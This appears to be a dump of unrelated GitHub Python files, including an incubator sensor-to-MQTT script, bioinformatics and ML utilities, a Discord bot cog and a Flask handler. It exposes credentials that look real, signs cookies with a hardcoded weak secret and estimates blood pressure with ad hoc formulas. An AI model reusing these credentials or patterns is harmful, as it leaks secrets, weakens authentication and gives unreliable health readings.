This should be obtained from the Cayenne Dashboard.\nMQTT_USERNAME = \"4d158210-e641-11eb-8779-7d56e82df461\"\nMQTT_PASSWORD = \"ca89ad8811a5ea3006523a32946b58491a1a4c65\"\nMQTT_CLIENT_ID = \"b65c60f0-4761-11ec-ad90-75ec5e25c7a4\"\n\n\nclient = cayenne.client.CayenneMQTTClient()\nclient.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)\n# For a secure connection use port 8883 when calling client.begin:\n# client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID, port=8883)\n\n\ntimestamp = 0\n\n\nif __name__ == '__main__':\n #Create I2C BUS\n I2Cbus = smbus.SMBus(1)\n\n with smbus.SMBus(1) as I2Cbus:\n slaveSelect = input(\"Which device (1-2): \")\n\n if slaveSelect == \"1\":\n ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=2)\n ser.flush() \n oxy_data=bus.read_byte(OXY_ADDRESS,0)\n timer = []\n hrdata= []\n start_word = False\n while True:\n \n try:\n data = ser.readline().decode('utf-8').rstrip()\n #time.sleep(0.3)\n hrdata.append(data) # append to data vector \n \n time_arr = round(time.time())\n print(type(time_arr))\n timer.append(time_arr)\n print(hrdata)\n if len(hrdata) > 25:\n break\n \n except KeyboardInterrupt:\n \n break\n \n print(\"Exited Loop\") \n hrdata_arr=np.array(hrdata)\n timer_arr=np.array(timer) \n #Sample Rate\n fs=hp.get_samplerate_mstimer(timer_arr)\n print(\"fs: \",fs) \n #String to Int\n for i in range(len(hrdata_arr)):\n hr_int=hrdata_arr.astype(np.int32)\n #hr_int=np.empty_like(hrdata_arr, dtype = int) \n \n print(\"PPG data: \",hr_int)\n\n time.sleep(0.4)\n print(\"Extracting measurements...\")\n time.sleep(1)\n \n #Heart Rate\n hr_fft=np.fft.fft(hr_int)\n print(\"FFT: \",hr_fft)\n freq=np.fft.fftfreq(len(hr_fft))\n \n print(\"hr_fft: \",hr_fft)\n fft_peak=find_peaks(hr_fft,threshold=350,distance=30)\n print(\"Peaks from FFT: \",fft_peak)\n \n bpm=(np.mean(fft_peak[:1])*6)\n \n \n #SBP Calculation\n pks=find_peaks(hr_int,threshold=400, distance=20, width=50,prominence=200)\n add = (sum(pks[:1]))\n div = len(pks[:1])\n p=(np.diff(np.sign(np.diff(hr_int))) < 0).nonzero()[0] + 1 \n \n print(\"Peaks Detected: \",p)\n sys=np.mean(p)*8\n \n \n\n #DBP Calculation\n vall=find_peaks(hr_int,threshold=200, distance=20) \n add2 = sum(vall[:1])\n div2 = len(vall[:1])\n v=(np.diff(np.sign(np.diff(hr_int))) > 0).nonzero()[0] + 1\n print(\"local min: \",v)\n v_mean = np.mean(v)*8\n print(v_mean)\n dias=(sys-38)*0.9996\n print(\"Valleys detected: \",vall[:1])\n\n #MAP Estimation\n m_ap=(dias+(2*dias))*0.33\n print(\"Heart Rate: \",bpm)\n print(\"SBP: \",sys)\n print(\"DBP:\", dias)\n print(\"Mean Arterial Pressure: \",m_ap)\n\n #Send data to CayenneMQTT\n while True:\n \n client.loop()\n if (time.time() > timestamp + 10):\n client.virtualWrite(1,bpm)\n client.virtualWrite(3,sys)\n client.virtualWrite(4,dias)\n timestamp = time.time()\n \n time.sleep(0.3)\n \n if slaveSelect == \"2\":\n #opening serial port\n ser=serial.Serial('/dev/ttyACM0', 9600) \n temp = []\n while True:\n tem=bus.read_byte_data(OXY_ADDRESS,0)\n print(\"data from DHT22: \", tem)\n print(type(tem))\n serialdata=ser.readline().decode('utf-8').rstrip() \n print(\"data recieved: \",serialdata)\n temp.append(serialdata)\n print(type(temp))\n print(\"temp: \",temp)\n #temp=int(serialdata)\n client.loop()\n client.virtualWrite(2,temp)\n time.sleep(0.3)\n\n #WRITE ADDRESS OF ADITIONAL SENSORS\n \n #if slaveSelect == \"3\":\n # while True:\n # data1=bus.read_byte_data(slavex_address,0)\n # client.loop()\n # chan_x=5\n # client.virtualWrite(chan_x,data1)\n # time.sleep(0.3)\n #if slaveSelect == \"4\":\n # 
while True:\n # data2=bus.read_byte_data(slavex_address,0)\n # client.loop()\n # chan_y=6\n # client.virtualWrite(chan_y,data2)\n # time.sleep(0.3)\n \n #if slaveSelect == \"5\":\n # while True:\n # data3=bus.read_byte_data(slavex_address,0)\n # client.loop()\n # chan_z=7\n # client.virtualWrite(chan_z,data3)\n # time.sleep(0.3)\n \n\n","repo_name":"KamyHernandez/IncubatorSystem","sub_path":"main-code.py","file_name":"main-code.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31160361222","text":"\"\"\"\n This script is used to select one specific annotation from 5 different NCBI annotations for each transcript primarily based\n on the gene's functional annotation and secondary based on the highest bit_score value.\n\"\"\"\n\n\nimport re\ninput_file = open(\"BLASTP_M_corti.PRJEB510.WBPS15.protein_NCBI.txt\", 'r')\noutput_file = open (\"BLASTP_M_cort.PRJEB510.WBPS15.protein_NCBI_final.txt\", 'a+')\n\n\n\ngene = \"\"\nconcrete_gene = 0\nlast_transcript = \"\"\nfirst_line = \"\"\nunknown = [\"unknown\", \"hypothetical\", \"unnamed\"]\nfor line in input_file:\n splitter = re.split('\\t', line)\n transcript = splitter[0]\n if last_transcript == transcript and concrete_gene == 1: # transcript with concrete annotation\n continue\n elif last_transcript == transcript and concrete_gene == 0: # transcript with no concrete annotation\n gene = splitter[2]\n if any(un in gene for un in unknown):\n concrete_gene = 0\n else:\n concrete_gene = 1\n output_file.write(line)\n else:\n if last_transcript != transcript and concrete_gene == 0 and last_transcript != \"\": # transcript with all unknown annotations, write the first annotation\n output_file.write(first_line)\n last_transcript = transcript\n first_line = line # the first annotation\n gene = splitter[2]\n if any(un in gene for un in unknown):\n concrete_gene = 0\n else:\n concrete_gene = 1\n output_file.write(line)\n","repo_name":"korenal/Analyza_transkriptomu_DP","sub_path":"filtering_ncbi.py","file_name":"filtering_ncbi.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74048036623","text":"from inspect import signature\nfrom typing import Dict, Optional, Union\n\nimport torch\nfrom transformers import AutoConfig\nfrom auto_quant.quant.rtn.models import *\n\nRTN_CAUSAL_LM_MODEL_MAP = {\n \"bloom\": BloomRTNForCausalLM,\n \"gpt_neox\": GPTNeoXRTNForCausalLM,\n \"gptj\": GPTJRTNForCausalLM,\n \"gpt2\": GPT2RTNForCausalLM,\n \"llama\": LlamaRTNForCausalLM,\n \"opt\": OPTRTNForCausalLM,\n \"moss\": MOSSRTNForCausalLM,\n \"gpt_bigcode\": GPTBigCodeRTNForCausalLM,\n \"codegen\": CodeGenRTNForCausalLM,\n \"RefinedWebModel\": RWRTNForCausalLM,\n \"RefinedWeb\": RWRTNForCausalLM,\n \"falcon\": RWRTNForCausalLM,\n \"baichuan\": BaiChuanRTNForCausalLM,\n \"internlm\": InternLMRTNForCausalLM,\n \"qwen\": QwenRTNForCausalLM,\n \"mpt\": MptRTNForCausalLM,\n}\n\ndef check_and_get_model_type(model_dir, trust_remote_code=True):\n config = AutoConfig.from_pretrained(model_dir, trust_remote_code=trust_remote_code)\n if config.model_type not in RTN_CAUSAL_LM_MODEL_MAP.keys():\n raise TypeError(f\"{config.model_type} isn't supported yet. 
Only support: {list(RTN_CAUSAL_LM_MODEL_MAP.keys())}\")\n model_type = config.model_type\n return model_type\n\nclass AutoRTNForCausalLM:\n def __init__(self):\n raise EnvironmentError(\n \"AutoRTNForCausalLM is designed to be instantiated\\n\"\n \"using `AutoRTNForCausalLM.from_pretrained` if want to quantize a pretrained model.\\n\"\n \"using `AutoRTNForCausalLM.from_quantized` if want to inference with quantized model.\"\n )\n\n @classmethod\n def from_pretrained(\n self, \n model_path, \n quant_config: RTNConfig, \n max_memory: Optional[dict] = None,\n torch_dtype: torch.dtype = torch.float16,\n trust_remote_code: bool = False,\n **kwargs\n ) -> BaseRTNForCausalLM:\n \n model_type = check_and_get_model_type(model_path, trust_remote_code)\n return RTN_CAUSAL_LM_MODEL_MAP[model_type].from_pretrained(\n model_path, \n quant_config=quant_config,\n max_memory=max_memory,\n torch_dtype=torch_dtype,\n trust_remote_code=trust_remote_code,\n **kwargs\n )\n\n @classmethod\n def from_quantized(\n self, \n quant_path, \n device: Optional[Union[str, int]] = None,\n device_map: Optional[Union[str, Dict[str, Union[int, str]]]] = None,\n max_memory: Optional[dict] = None,\n low_cpu_mem_usage: bool = False,\n torch_dtype: torch.dtype = torch.float16, \n trust_remote_code: bool = False,\n **kwargs\n ) -> BaseRTNForCausalLM:\n model_type = check_and_get_model_type(quant_path, trust_remote_code)\n quant_func = RTN_CAUSAL_LM_MODEL_MAP[model_type].from_quantized\n # A static list of kwargs needed for huggingface_hub\n huggingface_kwargs = [\n \"cache_dir\",\n \"force_download\",\n \"proxies\",\n \"resume_download\",\n \"local_files_only\",\n \"use_auth_token\",\n \"revision\",\n \"subfolder\",\n \"_raise_exceptions_for_missing_entries\",\n \"_commit_hash\"\n ]\n keywords = {\n key: kwargs[key]\n for key in list(signature(quant_func).parameters.keys()) + huggingface_kwargs\n if key in kwargs\n }\n return quant_func(\n quant_path,\n device=device,\n device_map=device_map,\n max_memory=max_memory,\n low_cpu_mem_usage=low_cpu_mem_usage,\n torch_dtype=torch_dtype, \n trust_remote_code=trust_remote_code, \n **kwargs\n )","repo_name":"qwopqwop200/AutoQuant","sub_path":"auto_quant/quant/rtn/models/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"15118454827","text":"import sys\nimport cv2\nimport numpy as np\nimport os\nimport glob\nimport ipdb\n\nif len(sys.argv)!=4:\n print('please enter: python run_cam_calib.py image_path chess_width_dim chess_height_dim')\n exit()\nelse:\n image_path = sys.argv[1]\n chess_width_dim = int(sys.argv[2])\n chess_height_dim = int(sys.argv[3])\n \n\nsquare_size = 2.0\n\n\nresult_image_path = image_path + '/result/'\nif not os.path.exists(result_image_path):\n os.makedirs(result_image_path)\n\n# Defining the dimensions of checkerboard\nCHECKERBOARD = (chess_height_dim,chess_width_dim)\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n# Creating vector to store vectors of 3D points for each checkerboard image\nobjpoints = []\n# Creating vector to store vectors of 2D points for each checkerboard image\nimgpoints = [] \n\n\n# Defining the world coordinates for 3D points\nobjp = np.zeros((1, CHECKERBOARD[0] * CHECKERBOARD[1], 3), np.float32)\nobjp[0,:,:2] = np.mgrid[0:CHECKERBOARD[0], 0:CHECKERBOARD[1]].T.reshape(-1, 2)\nobjp *= square_size\n\nprev_img_shape = None\n\n\n# Extracting path of individual image stored in a given 
directory\nimg_path_with_ext = image_path + '/*.jpg'\nimages = glob.glob(img_path_with_ext)\ni = 0\nj = 0\nfor fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n h,w = gray.shape\n ipdb.set_trace()\n # Find the chess board corners\n # If desired number of corners are found in the image then ret = true\n print(\"find chessboardcorner in %d image\"%i)\n if h > 2000:\n small_gray = cv2.resize(gray,(w//2,h//2))\n ret, corners = cv2.findChessboardCorners(small_gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_NORMALIZE_IMAGE)\n\n if ret==True:\n corners = 2*corners \n else:\n ret, corners = cv2.findChessboardCorners(gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_NORMALIZE_IMAGE)\n \n \"\"\"\n If desired number of corner are detected,\n we refine the pixel coordinates and display \n them on the images of checker board\n \"\"\"\n if ret == True:\n print(\"image %d find corner!\"%i)\n j = j+1\n objpoints.append(objp)\n # refining pixel coordinates for given 2d points.\n corners2 = cv2.cornerSubPix(gray, corners, (5,5),(-1,-1), criteria)\n \n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, CHECKERBOARD, corners2, ret)\n \n img_filename = result_image_path + '/chess_img_%02d_find.jpg'%i\n else:\n img_filename = result_image_path + '/chess_img_%02d_not_find.jpg'%i\n\n i = i +1\n cv2.imwrite(img_filename,img)\n \nfind_ratio = j/i\nprint('the ratio of findcorner is %f'%(find_ratio))\n\n\"\"\"\nPerforming camera calibration by \npassing the value of known 3D points (objpoints)\nand corresponding pixel coordinates of the \ndetected corners (imgpoints)\n\"\"\"\n\n\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\nmean_error = 0\n\nfor i in range(len(objpoints)):\n imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)\n error = cv2.norm(imgpoints[i], imgpoints2, cv2.NORM_L2)/len(imgpoints2)\n mean_error += error\n\n\navg_error = mean_error/len(objpoints)\n\nprint(\"\\nrms: %f, error: %f\\n\"%(ret,avg_error))\nprint(\"Camera matrix : \\n\")\nprint(mtx)\nprint(\"dist : \\n\")\nprint(dist)\n\n\n\nfc = open('%s/calib.txt'%result_image_path,'w+')\nfc.write('camera_intrinsc:\\n')\nfc.write('-------------------------------------------------------\\n')\nfc.write('rms: %f, error: %f\\n\\n'%(ret,avg_error))\nfc.write('camera matrix:\\n')\nfc.write('[ %e, %e, %e]\\n'%(mtx[0][0],mtx[0][1],mtx[0][2]))\nfc.write('[ %e, %e, %e]\\n'%(mtx[1][0],mtx[1][1],mtx[1][2]))\nfc.write('[ %e, %e, %e]\\n'%(mtx[2][0],mtx[2][1],mtx[2][2]))\nfc.write('\\ndistortion:\\n[%e, %e, %e, %e, %e]\\n'%(dist[0][0],dist[0][1],dist[0][2],dist[0][3],dist[0][4]))\nfc.write('-------------------------------------------------------\\n')\nfc.write('\\n %f %% image can find corner\\n'%(find_ratio*100))\nfc.close()\n\n\n\n\n\n# #camera matrix with lens distortion\nnewcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,gray.shape[::-1],0,gray.shape[::-1])\n\ni = 0\nfor fname in images:\n img = cv2.imread(fname)\n # undistort\n dst = cv2.undistort(img, mtx, dist, None, newcameramtx)\n\n # crop the image\n x,y,w,h = roi\n dst = dst[y:y+h, x:x+w]\n i=i+1\n \n undist_and_dist_img =cv2.vconcat([img,dst])\n img_filename = result_image_path + '/undist_img_%02d.jpg'%i\n cv2.imwrite(img_filename, undist_and_dist_img)\n 
\n\n\n\n\n","repo_name":"lesialin/video_stab","sub_path":"utility/camera_calibration/run_cam_calib.py","file_name":"run_cam_calib.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"36443607446","text":"import numpy as np\nimport pandas as pd\nfrom gensim.utils import simple_preprocess\nfrom gensim.models.doc2vec import TaggedDocument, Doc2Vec\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\n\nclass Doc2VecModel(BaseEstimator, TransformerMixin):\n def __init__(self, dm=1, vector_size=1, window=1, epochs=5, **args):\n self.size = vector_size\n self.window = window\n self.dm = dm\n self.epochs = epochs\n self.model = Doc2Vec(vector_size=self.size, window=self.window,\n dm=self.dm, epochs=self.epochs, **args)\n self.tagged_documents = None\n self.incrementer = -1 # for indexing each document\n\n def tag_example(self, raw_document):\n self.incrementer += 1\n return TaggedDocument(words=raw_document, tags=[self.incrementer])\n\n def fit(self, raw_documents):\n processed_documents = raw_documents.apply(simple_preprocess, )\n\n # Generate Tagged Examples\n self.tagged_documents = processed_documents.apply(self.tag_example, )\n\n # Build vocabulary\n self.model.build_vocab(corpus_iterable=self.tagged_documents)\n\n if len(self.model.wv.key_to_index) == 0:\n raise Exception(\"Either number of min_count is very less or no sample is present is input data.\")\n\n # Train model\n self.model.train(corpus_iterable=self.tagged_documents,\n total_examples=self.model.corpus_count,\n epochs=self.model.epochs)\n\n def score(self):\n ranks = []\n for tagged_document in self.tagged_documents:\n try:\n inferred_vector = self.model.infer_vector(self.tagged_documents[tagged_document.tags[0]].words)\n except IndexError:\n continue\n sims = self.model.dv.most_similar([inferred_vector], topn=len(self.model.dv))\n rank = [docid for docid, sim in sims].index(tagged_document.tags[0])\n ranks.append(rank)\n counter_0 = ranks.count(0)\n return counter_0 / self.tagged_documents.shape[0]\n\n\ndef build_d2v(training_data: pd.Series, configs: dict):\n params = configs[\"D2V\"][\"PARAMS\"]\n d2v = Doc2VecModel(**params)\n d2v.fit(training_data)\n accuracy_score = d2v.score()\n return d2v, params, accuracy_score\n\n\n\"\"\"confi = {'D2V': {'PARAMS': {'alpha': 0.025, 'dbow_words': 1, 'dm': 1, 'epochs': 100,\n 'min_alpha': 0.001, 'min_count': 1,\n 'vector_size': 5, 'window': 1\n }\n }\n }\n\ntrain_series = pd.Series([\"graphic designer adobe illustrator adobe photoshop adobe\",\n \"big data concepts logical thinking\",\n \"analyst microsoft excel tableau\",\n \"machine learning deep learning data science\",\n \"react js javascript swift android developer\"\n ],\n name='features'\n )\n\nmodel, par, score = build_d2v(training_data=train_series, configs=confi)\n\nprint(type(model))\nprint(par)\nprint(score)\n\"\"\"","repo_name":"prem-rawat-glosity/careers-recommendation","sub_path":"modelling/d2v_model.py","file_name":"d2v_model.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22133070982","text":"while True:\n try:\n n = int(input())\n except:\n break\n bits = n & 0xffffffff\n ans = 0\n op = bits & 0x000000ff\n ans = ans | (op << 24)\n op = bits & 0x0000ff00\n ans = ans | (op << 8)\n op = bits & 0x00ff0000\n ans = ans | (op >> 8)\n op = bits & 0xff000000\n ans = ans | (op >> 24)\n \n if ans & (1 << 31):\n ans -= 
0x100000000\n print(n, 'converts to', ans)\n","repo_name":"shhrrtnvr/uva_in_python","sub_path":"uva_594_onelittletwolittletreelittleendians.py","file_name":"uva_594_onelittletwolittletreelittleendians.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71157183183","text":"\"\"\"\nThis file is part of KIGM-Discord-Bot.\n\nKIGM-Discord-Bot is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nKIGM-Discord-Bot is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with KIGM-Discord-Bot. If not, see .\n\"\"\"\n\nimport asyncio\nimport os\nimport random\n\nimport asyncpraw\nimport discord\nfrom discord import utils\nimport humor_langs\n\n# from PIL import Image\n# from io import BytesIO\nfrom discord.ext import commands\nfrom discord.ext.commands import BucketType, cooldown\n\n\nclass FunCommands(commands.Cog, name=\"😄 Fun Commands\"):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(description=\"pls dont spam this command\")\n @commands.guild_only()\n @cooldown(1, 2, BucketType.user)\n async def meme(self, ctx):\n if len(self.bot.av_memes) > 0:\n _meme = random.choice(self.bot.av_memes)\n self.bot.av_memes.remove(_meme)\n sub_origin = _meme.subreddit\n await sub_origin.load()\n memebed = discord.Embed(\n title=_meme.title,\n description=f\"**Subreddit:** `r/{sub_origin.display_name}`\\n**Author:** `u/{_meme.author.name}`\",\n color=self.bot.main_color,\n url=\"https://www.reddit.com{}\".format(_meme.permalink),\n )\n\n memebed.set_author(name=ctx.author, icon_url=ctx.author.avatar_url)\n memebed.set_image(url=_meme.url)\n memebed.set_footer(text=f\"👍 {_meme.score} 💬 {_meme.num_comments}\")\n\n await ctx.send(embed=memebed)\n else:\n await ctx.error(\"No juicy memes found.\")\n await self.bot.renew_memes()\n\n @commands.command(description=\"Convert text to binary00101001\")\n @commands.guild_only()\n async def binary(self, ctx, *, text):\n res = \"\".join(format(i, \"b\") for i in bytearray(text, encoding=\"utf-8\"))\n embed = discord.Embed(title=\"Text To Binary\", color=self.bot.main_color)\n embed.add_field(name=\"Normal Text:\", value=text, inline=False)\n embed.add_field(name=\"Binary Text:\", value=f\"`{str(res)}`\", inline=False)\n embed.set_footer(\n text=f\"Requested By {ctx.author}\", icon_url=ctx.author.avatar_url\n )\n\n await ctx.send(embed=embed)\n\n @commands.command(\n description=\"Returns a (really bad) dad joke to you\",\n aliases=[\"dadjokes\", \"djoke\", \"dadj\"],\n )\n @commands.guild_only()\n async def dadjoke(self, ctx):\n async with self.bot.session.get(\"https://icanhazdadjoke.com\", headers={\"Accept\": \"text/plain\"}) as resp:\n joke = await resp.text()\n\n if \"’\" in joke:\n better_joke = joke.replace(\"’\", \"'\")\n embed = discord.Embed(\n title=\"Heard this joke from dad! :bearded_person:\",\n description=better_joke,\n colour=discord.Colour.blue(),\n )\n embed.set_footer(\n icon_url=ctx.author.avatar_url, text=f\"Requested by: {ctx.author.name}\"\n )\n else:\n embed = discord.Embed(\n title=\"Heard this joke from daddy! 
:bearded_person:\",\n description=joke,\n colour=discord.Colour.blue(),\n )\n embed.set_footer(\n icon_url=ctx.author.avatar_url, text=f\"Requested by {ctx.author.name}\"\n )\n\n embed.set_author(\n name=\"All dad jokes from icanhazdadjoke.com so shoutout to them\"\n )\n await ctx.send(embed=embed)\n\n @commands.command(description=\"lol idk manipulate me to saying something\")\n @commands.guild_only()\n @cooldown(1, 5, BucketType.user)\n async def say(self, ctx):\n await ctx.message.delete()\n embed = discord.Embed(\n title=\"Go. Tell me what you want me to say\",\n description=\"||If you don't tell me what I'm going to say in less than 20 seconds, the command won't execute.||\",\n color=self.bot.main_color,\n )\n sent = await ctx.send(embed=embed)\n\n resp_content = await ctx.input(dr=True, delete_after=6.0)\n\n if not resp_content:\n ctx.command.reset_cooldown(ctx)\n return\n\n try:\n await sent.delete()\n except discord.HTTPException:\n pass\n\n await ctx.send(resp_content)\n\n @commands.command(description=\"Converts your text to OwO ^--^\", aliases=[\"0w0\"])\n @commands.guild_only()\n async def owo(self, ctx, *, sentence: utils.escape_mentions):\n await ctx.message.reply(humor_langs.owofy(sentence), mention_author=True)\n\n @commands.command(description=\"Converts your text to BriIsh\", aliases=[\"british\"])\n @commands.guild_only()\n async def britishaccent(self, ctx, *, sentence: utils.escape_mentions):\n await ctx.message.reply(\n humor_langs.strong_british_accent(sentence), mention_author=True\n )\n\n @commands.command(\n description=\"Converts your text to emoji! 💩\",\n aliases=[\"texttoemoji\", \"emojithis\", \"tte\"],\n )\n @commands.guild_only()\n async def text_to_emoji(self, ctx, *, sentence: utils.escape_mentions):\n await ctx.message.reply(humor_langs.text_to_emoji(sentence), mention_author=True)\n\n @commands.command(\n description=\"Clap your way with adding the clap :clap: emoji between every letter/word!\",\n aliases=[\"clapify\"],\n )\n async def clap(self, ctx, *, phrase: utils.escape_mentions):\n await ctx.message.reply(humor_langs.clap_emojifier(phrase), mention_author=True)\n\n @commands.command(description=\"V i r t u a l s l a p p\", aliases=[\"slapp\"])\n @commands.guild_only()\n async def slap(self, ctx, *, User: discord.Member):\n slap_gif = [\n \"https://tenor.com/view/bobs-burgers-louise-louise-slaps-slap-gif-12656044\",\n \"https://tenor.com/view/dog-slap-gif-3468779\",\n \"https://tenor.com/view/slap-virtual-slap-boglio-laurene-boglio-gif-13857116\",\n \"https://tenor.com/view/amanda-bynes-slap-gif-4079563\",\n \"https://tenor.com/view/baka-slap-huh-angry-gif-15696850\",\n ]\n slap_gifs = random.choice(slap_gif)\n\n if User.id == ctx.guild.me.id:\n await ctx.send(\n \"https://tenor.com/view/hell-no-disagree-no-nope-never-gif-14721955\"\n )\n\n elif ctx.author.mention == User.mention:\n await ctx.send(\"weirdo\")\n await ctx.send(\n \"https://tenor.com/view/sgo48-slap-sgo48nini-slap-your-self-gif-15092286\"\n )\n else:\n await ctx.channel.send(\n ctx.author.mention + f\" has slapped \" + User.mention + \"! 
:scream:\"\n )\n await ctx.channel.send(slap_gifs)\n\n @commands.command(\n description=\"Disclaimer: Do not try this at home\", aliases=[\"shot\"]\n )\n async def shoot(self, ctx, *, User: discord.Member = None):\n shoot_gif = [\n \"https://tenor.com/view/die-gun-shotgun-deus-vult-gif-17767114\",\n \"https://tenor.com/view/gun-shotgun-shooting-fire-cartoon-gif-14404861\",\n \"https://tenor.com/view/gun-gunshot-gunfire-gif-15642482\",\n \"https://tenor.com/view/water-gun-melissa-mc-carthy-gotcha-attack-childish-gif-7720147\",\n \"https://tenor.com/view/kermit-shoot-lol-gun-frog-gif-16181496\",\n \"https://tenor.com/view/cat-shooting-mouth-open-gif-15017033\",\n ]\n shoot_gifs = random.choice(shoot_gif)\n\n if User is None:\n await ctx.send(\"K I'll shoot u instead lol\")\n await ctx.send(shoot_gifs)\n\n elif ctx.author.mention == User.mention:\n await ctx.send(\"why r u like this\")\n await ctx.send(\"I hope ur ok\")\n await ctx.send(\"pls don't be that type of person\")\n await ctx.send(\"I hope you're fine :) :heartpulse:\")\n\n elif User.id == ctx.guild.me.id:\n await ctx.send(\"not happening lol\")\n\n else:\n await ctx.channel.send(\n ctx.author.mention + f\" has shot \" + User.mention + \"! :scream: \"\n )\n await ctx.channel.send(shoot_gifs)\n\n @commands.command(description=\"Just type it and see what happens...\")\n async def YEET(self, ctx, User: discord.Member = None):\n if User is None:\n await ctx.send(\n \":woman_cartwheeling:\\n :manual_wheelchair: :man_golfing:\"\n )\n else:\n await ctx.send(\n f\":woman_cartwheeling:\\n ^\"\n + User.mention\n + f\"\\n :manual_wheelchair: :man_golfing:\\n ^{ctx.author.mention}\"\n )\n\n @commands.command(description=\"will give you a random spoiler from a movie!\")\n async def spoiler(self, ctx):\n await ctx.message.reply(\n \"https://media.discordapp.net/attachments/767572984860508160/770165174891184148/image0.gif\",\n mention_author=True,\n )\n\n\ndef setup(bot):\n bot.add_cog(FunCommands(bot))\n","repo_name":"Makiyu-py/KIGM-Discord-Bot","sub_path":"cogs/comms/cog_fun.py","file_name":"cog_fun.py","file_ext":"py","file_size_in_byte":9477,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"4429600026","text":"try:\n entrada = input(\"Ingrese nombre del archivo: \")\n archivo = open(entrada, \"r\", encoding=\"UTF-8\") \n for linea in archivo:\n print(linea.upper())\nexcept:\n print(\"Error, no existe el\")\n\n\n\n\n#print(archivo.read())\n#encoding: f_8 normalmente usado r read a applicate \n#por cada línea en el archivo ,,entrada,\"r\", \"names.txt\", \"a\", encoding=\"UTF-8\"","repo_name":"Micor24/TEA","sub_path":"shout.py","file_name":"shout.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72625600144","text":"\"\"\"\nInput: nums = [1,1,2]\nOutput: 2, nums = [1,2]\n\nInput: nums = [0,0,1,1,1,2,2,3,3,4]\nOutput: 5, nums = [0,1,2,3,4]\n\nExplanation: Your function should return length = 2, with the first two elements of nums being 1 and 2 respectively. 
\nIt doesn't matter what you leave beyond the returned length.\n\"\"\"\n\nclass Solution:\n    def removeDuplicates(self, nums):\n        i = 0\n        while i < len(nums)-1:\n            if nums[i] == nums[i+1]:\n                del nums[i]\n                i -= 1\n            i += 1\n        # the problem statement asks for the new length; nums is deduplicated in place\n        return len(nums)\n\n\ns = Solution()\nprint(s.removeDuplicates([0,0,0,0,0,1,1,1,2,2,3,3,3,4,4]))","repo_name":"kartikeyab/leetcode-prac","sub_path":"arrays/remove_duplicate_inplace.py","file_name":"remove_duplicate_inplace.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"33243521494","text":"import hmac\nfrom flask import make_response, request, redirect\nfrom flask.views import MethodView\nfrom datetime import datetime, date\n\nbase_path = './static/%s'\nadmin_username = 'ljj'\n\nclass PageHandler(MethodView):\n\tdef render(self, content):\n\t\tresp = make_response(content)\n\t\treturn resp\n\n\tdef render_json(self, content):\n\t\tresp = make_response(content)\n\t\tresp.headers['content-type'] = 'application/json'\n\t\treturn resp\n\n\tdef render_file(self, filename):\n\t\tfilepath = base_path % filename\n\t\twith open(filepath, 'r') as f:\n\t\t\tcontent = f.read()\n\t\t\treturn self.render(content)\n\n\tdef get_args(self, key):\n\t\treturn request.args.get(key)\n\n\tdef get_date(self, year=0, month=0, day=0):\n\t\tif year and month and day:\n\t\t\treturn date(year, month, day)\n\t\telse:\n\t\t\treturn date.today()\n\n\tdef get_referer(self):\n\t\treturn request.headers.get('referer')\n\n\tdef get_cookies(self):\n\t\treturn request.cookies\n\n\tdef get_form(self):\n\t\tform = {}\n\t\tif request.is_json:\n\t\t\t# type-dict\n\t\t\tform = request.get_json()\n\t\telse:\n\t\t\tform = request.form.to_dict()\n\t\treturn form\n\n\tdef login(self, user):\n\t\tresp = make_response('succ')\n\t\tresp.set_cookie(key='username', value=user.username, max_age=3600)\n\t\tuid_and_digest = make_secure_cookie(user.uid, user.username)\n\t\tresp.set_cookie(key='uid', value=uid_and_digest, max_age=3600)\n\t\tresp.set_cookie(key='nickname', value=user.nickname, max_age=3600)\n\t\treturn resp\n\n\tdef logout(self):\n\t\ttarget = '/'\n\t\tresp = redirect(target)\n\t\tresp.set_cookie(key='username', value='')\n\t\tresp.set_cookie(key='uid', 